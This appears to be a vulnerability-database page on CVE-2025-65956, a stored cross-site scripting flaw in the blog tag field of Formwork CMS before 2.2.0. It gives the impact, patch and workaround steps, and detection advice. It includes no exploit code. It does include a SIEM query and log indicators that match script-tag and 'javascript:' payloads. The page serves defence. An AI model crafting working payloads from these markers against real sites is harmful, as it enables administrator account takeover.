Login Sign Up

CVE-2025-65956

6.5 MEDIUM
Cross-Site Scripting

📋 TL;DR

Formwork CMS versions before 2.2.0 have a stored cross-site scripting vulnerability in the blog tag field. Attackers with CMS credentials can inject malicious scripts that execute when administrators view or edit affected blog posts. This allows privilege escalation within the administrative interface.

💻 Affected Systems

Products:
  • Formwork CMS
Versions: All versions prior to 2.2.0
Operating Systems: All
Default Config Vulnerable: ⚠️ Yes
Notes: Requires attacker to have CMS credentials; affects administrative interface workflows.

📦 What is this software?

Formwork by Formwork Project

View all CVEs affecting Formwork →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Administrator account compromise leading to full CMS takeover, data theft, or website defacement through injected malicious scripts.

🟠

Likely Case

Session hijacking of administrative users, credential theft via keyloggers, or unauthorized CMS configuration changes.

🟢

If Mitigated

Limited impact with proper input validation and output encoding in place, though administrative workflows remain vulnerable.

🌐 Internet-Facing: MEDIUM
🏢 Internal Only: HIGH

🎯 Exploit Status

Public PoC: ✅ No
Weaponized: LIKELY
Unauthenticated Exploit: ✅ No
Complexity: LOW

Exploitation requires authenticated access to CMS; stored XSS payloads are simple to craft.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 2.2.0

Vendor Advisory: https://github.com/getformwork/formwork/security/advisories/GHSA-7j46-f57w-76pj

Restart Required: No

Instructions:

1. Backup your Formwork installation and database. 2. Download Formwork 2.2.0 from GitHub. 3. Replace existing files with new version. 4. Clear any cached data. 5. Verify functionality.

🔧 Temporary Workarounds

Input Sanitization

all

Manually sanitize blog tag inputs by removing HTML/JavaScript tags before storage.

Modify Formwork source to apply htmlspecialchars() or similar filtering to blog tag fields

Content Security Policy

all

Implement strict CSP headers to block inline script execution in admin interface.

Add 'Content-Security-Policy: script-src 'self'' to admin panel headers

🧯 If You Can't Patch

  • Restrict administrative user access to trusted personnel only
  • Implement web application firewall rules to detect XSS payloads in blog tag fields

🔍 How to Verify

Check if Vulnerable:

Check Formwork version in admin panel or via composer.json; versions <2.2.0 are vulnerable.

Check Version:

Check composer.json for version or view admin panel footer

Verify Fix Applied:

After updating, test by attempting to insert script tags in blog tag field; they should be sanitized or escaped.

📡 Detection & Monitoring

Log Indicators:

  • Unusual blog tag entries containing script tags or JavaScript code
  • Multiple failed login attempts followed by blog post modifications

Network Indicators:

  • HTTP requests with script payloads in tag parameters
  • Unusual outbound connections from admin interface

SIEM Query:

source="formwork_logs" AND (message="*<script>*" OR message="*javascript:*")

📊 Metadata

CVE ID: CVE-2025-65956
CVSS v3 Score: 6.5 (MEDIUM)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L
CWE: CWE-79
EPSS Score: 0.04% exploit probability (10.4th percentile)
Published: November 26, 2025
Last Updated: December 3, 2025

🔗 References

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2025-65956, you might also want to check these:

CVE-2021-39199 10.0

CVE-2021-39199 is a critical cross-site scripting (XSS) vulnerability in the remark-html Node.js lib...

Same vulnerability type (CWE-79)
CVE-2021-32671 10.0

This vulnerability in Flarum forum software allows attackers to inject malicious HTML/JavaScript int...

Same vulnerability type (CWE-79)
CVE-2021-32798 10.0

CVE-2021-32798 is a critical vulnerability in Jupyter Notebook that allows malicious notebook files ...

Same vulnerability type (CWE-79)